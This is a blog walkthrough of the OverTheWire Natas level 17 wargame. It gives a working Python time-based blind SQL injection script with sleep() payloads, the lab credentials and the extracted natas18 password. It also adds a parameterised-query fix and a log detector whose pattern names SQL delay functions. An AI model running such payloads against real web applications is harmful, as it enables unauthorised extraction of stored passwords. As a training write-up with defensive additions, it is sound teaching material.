
Overthewire-natas17

Posted: 2021-06-02 12:01:16


Overthewire level 17 to level 18

After opening the page, we are asked to enter a username and it checks whether that user exists. This is very similar to level 15, but the difference is that this level no longer echoes the result. Even with the output switched off, we still have a way to learn whether the corresponding SQL statement evaluated to true or false: the technique is called blind injection (Blind injection). Here we use the time-based variant, calling sleep() inside the injected condition and judging the result from how long the request takes.
The code is as follows.

import requests

target = 'http://natas17.natas.labs.overthewire.org/index.php'

# Candidate character set for the password (letters and digits).
chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'

filtered = ''   # characters that occur somewhere in the password
passwd = ''     # password recovered so far

# Pass 1: for each candidate character, ask whether it occurs anywhere in the
# password. LIKE BINARY keeps the comparison case-sensitive; sleep(2) only runs
# when the preceding condition is true, so a slow response means "yes".
for char in chars:
    payload = {'username': f'natas18" and password like binary "%{char}%" and sleep(2)#'}
    resp = requests.post(target, auth=('natas17', '8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw'), data=payload)
    if resp.elapsed.total_seconds() >= 2:
        filtered += char
        print(filtered)

# Pass 2: extend the known prefix one character at a time, trying only the
# characters found in pass 1. The natas18 password is 32 characters long.
# (The username must be natas18 here too; the original had natas16, which
# would match no row and never trigger the delay.)
for _ in range(32):
    for char in filtered:
        payload = {'username': f'natas18" and password like binary "{passwd + char}%" and sleep(2)#'}
        resp = requests.post(target, auth=('natas17', '8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw'), data=payload)
        if resp.elapsed.total_seconds() >= 2:
            passwd += char
            print(passwd)
            break

As in level 15, we first use filtered to narrow down the set of characters that can appear at all, and then brute-force the password one position at a time from that smaller set.
The output of the run is as follows.
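The point of this level, that hiding the output does not remove the oracle, is easiest to see side by side with the fix. The following is an added example, not code from the writeup or from OverTheWire: it builds a small in-memory SQLite table with made-up rows, runs a lookup that pastes the username into the SQL text (the pattern the level is built on) next to one that binds it as a parameter, and feeds both the same probe. The probe is adapted to SQLite syntax (single quotes, no `#` comment), and the function and table names are my own. Here the oracle is whether a row comes back rather than a delay, but the leak is the same: with interpolation the probe rewrites the WHERE clause, with binding it is just a username that matches nothing.

```python
import sqlite3

# Constructed sample data for an in-memory database (not the Natas data).
SAMPLE_ROWS = [("natas18", "s3cret-Example-Pw"), ("alice", "hunter2")]


def make_db():
    """Create an in-memory users table populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def user_exists_vulnerable(conn, username):
    """Lookup that splices the input into the SQL text (the level's pattern)."""
    query = f"SELECT 1 FROM users WHERE username='{username}'"
    return conn.execute(query).fetchone() is not None


def user_exists_safe(conn, username):
    """Same lookup with a bound parameter: quotes and keywords in the value
    are data, never grammar, so the WHERE clause cannot be rewritten."""
    query = "SELECT 1 FROM users WHERE username=?"
    return conn.execute(query, (username,)).fetchone() is not None


def oracle_payload(prefix):
    """A probe in the spirit of the page's payload, in SQLite syntax: the
    template's closing quote terminates the LIKE literal."""
    return f"natas18' AND password LIKE '{prefix}%"


def demo():
    """Run the same probe through both lookups for a correct and a wrong prefix.
    Returns {prefix: (vulnerable_result, safe_result)}."""
    conn = make_db()
    results = {}
    for prefix in ("s3c", "zzz"):
        probe = oracle_payload(prefix)
        results[prefix] = (user_exists_vulnerable(conn, probe),
                           user_exists_safe(conn, probe))
    return results


if __name__ == "__main__":
    for prefix, (vuln, safe) in demo().items():
        print(f"prefix {prefix!r}: interpolated={vuln} bound={safe}")
```

The interpolated lookup answers True for the correct prefix and False for the wrong one, which is exactly the one bit per request the script above extracts through sleep(); the bound lookup answers False for both, because the whole probe is compared as a username.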

d
dg
dgh
dghj
dghjl
dghjlm
dghjlmp
dghjlmpq
dghjlmpqs
dghjlmpqsv
dghjlmpqsvw
dghjlmpqsvwx
dghjlmpqsvwxy
dghjlmpqsvwxyC
dghjlmpqsvwxyCD
dghjlmpqsvwxyCDF
dghjlmpqsvwxyCDFI
dghjlmpqsvwxyCDFIK
dghjlmpqsvwxyCDFIKO
dghjlmpqsvwxyCDFIKOP
dghjlmpqsvwxyCDFIKOPR
dghjlmpqsvwxyCDFIKOPR4
dghjlmpqsvwxyCDFIKOPR47
dghjlmpqsvwxyCDFIKOPR470
x
xv
xvK
xvKI
xvKIq
xvKIqD
xvKIqDj
xvKIqDjy
xvKIqDjy4
xvKIqDjy4O
xvKIqDjy4OP
xvKIqDjy4OPv
xvKIqDjy4OPv7
xvKIqDjy4OPv7w
xvKIqDjy4OPv7wC
xvKIqDjy4OPv7wCR
xvKIqDjy4OPv7wCRg
xvKIqDjy4OPv7wCRgD
xvKIqDjy4OPv7wCRgDl
xvKIqDjy4OPv7wCRgDlm
xvKIqDjy4OPv7wCRgDlmj
xvKIqDjy4OPv7wCRgDlmj0
xvKIqDjy4OPv7wCRgDlmj0p
xvKIqDjy4OPv7wCRgDlmj0pF
xvKIqDjy4OPv7wCRgDlmj0pFs
xvKIqDjy4OPv7wCRgDlmj0pFsC
xvKIqDjy4OPv7wCRgDlmj0pFsCs
xvKIqDjy4OPv7wCRgDlmj0pFsCsD
xvKIqDjy4OPv7wCRgDlmj0pFsCsDj
xvKIqDjy4OPv7wCRgDlmj0pFsCsDjh
xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhd
xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP

The password for level 18 is xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP. Also, this code needs to be run on a reasonably good network; otherwise latency from the network itself trips the 2-second threshold and the result comes out wrong, which is awkward...
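The same timing signal the script depends on is visible on the server side, where it becomes a detection opportunity. The following is an added example, not from the writeup: a small checker over constructed application log lines (timestamp, method, path, response time in milliseconds, and the URL-encoded username field; the format and the lines are invented here, not real Natas logs). It flags requests whose input still contains a time-delay function after inline SQL comments are stripped, and requests whose response time exceeds a threshold. The 1500 ms threshold is an assumption; in practice it would be set from the endpoint's measured baseline.

```python
import re
from urllib.parse import unquote_plus

# Constructed application log lines (tab-separated): timestamp, method, path,
# response time in ms, and the raw URL-encoded "username" form field as the
# application logged it. Made-up samples, not logs from the level.
SAMPLE_LOG = """\
2021-06-02T12:00:01Z\tPOST\t/index.php\t83\tnatas18
2021-06-02T12:00:02Z\tPOST\t/index.php\t2034\tnatas18%22+and+password+like+binary+%22%25d%25%22+and+sleep%282%29%23
2021-06-02T12:00:03Z\tPOST\t/index.php\t1900\talice
2021-06-02T12:00:04Z\tPOST\t/index.php\t2010\tnatas18%22+and+SLEEP/**/%282%29%23
"""

# Time-delay functions of common engines, matched after comment stripping so
# that /**/ padding between the name and the parenthesis does not hide the call.
DELAY_CALL = re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(", re.IGNORECASE)
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)


def normalize(value):
    """URL-decode the field, drop inline SQL comments, collapse whitespace."""
    decoded = unquote_plus(value)
    without_comments = SQL_COMMENT.sub(" ", decoded)
    return re.sub(r"\s+", " ", without_comments)


def analyze(log_text, slow_ms=1500):
    """Return [(timestamp, [reasons])] for every line worth looking at.

    A request is reported when its input contains a delay function, when its
    response time is at or above slow_ms, or both. A slow request without a
    recognised delay call is still reported: it is either load or a probe the
    pattern did not catch, and either way someone should look at it.
    """
    findings = []
    for line in log_text.splitlines():
        ts, _method, _path, rt_ms, username = line.split("\t")
        reasons = []
        if DELAY_CALL.search(normalize(username)):
            reasons.append("delay-function in input")
        if int(rt_ms) >= slow_ms:
            reasons.append("slow response")
        if reasons:
            findings.append((ts, reasons))
    return findings


if __name__ == "__main__":
    for ts, reasons in analyze(SAMPLE_LOG):
        print(ts, ", ".join(reasons))
```

Matching the pattern and the timing independently matters: the pattern alone misses payloads written in a form the regex does not know, and the timing alone cannot tell a probe from a slow backend, but a request that trips both is a strong signal, and a run of them whose input differs by one character is the enumeration loop itself.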


Original URL: https://www.cnblogs.com/wudiiv11/p/natas17.html
